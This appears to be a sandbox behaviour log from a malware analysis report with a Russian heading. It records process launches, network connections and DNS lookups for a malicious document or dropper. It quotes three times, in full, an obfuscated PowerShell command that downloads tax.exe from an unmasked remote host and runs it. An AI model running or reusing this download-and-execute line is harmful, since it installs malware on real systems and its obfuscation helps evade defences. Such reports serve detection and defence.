Техническая информация
- '<SYSTEM32>\cmd.exe' /c PowerShell(nEW-ObJECT ('System.'+'N'+'et.WebCli'+'en'+'t')).('Down'+'load'+'File').Invoke('http://www.jonetsuboutique.com/cache/tax.exe','%TEMP%\tax.exe');STARt-PRoCe`sS '%TEMP%\tax.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1984
- %TEMP%\1076812.cvr
- 'jo####uboutique.com':80
- 'ex#####freeresults.com':80
- http://www.jo####uboutique.com/cache/tax.exe
- http://www.ex#####freeresults.com/?dn##############################################
- DNS ASK jo####uboutique.com
- DNS ASK ex#####freeresults.com
- '<SYSTEM32>\cmd.exe' /c PowerShell(nEW-ObJECT ('System.'+'N'+'et.WebCli'+'en'+'t')).('Down'+'load'+'File').Invoke('http://www.jonetsuboutique.com/cache/tax.exe','%TEMP%\tax.exe');STARt-PRoCe`sS '%TEMP%\tax.exe';' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' (nEW-ObJECT ('System.'+'N'+'et.WebCli'+'en'+'t')).('Down'+'load'+'File').Invoke('http://www.jonetsuboutique.com/cache/tax.exe','%TEMP%\tax.exe');STARt-PRoCe`sS '%TEMP%\tax.exe';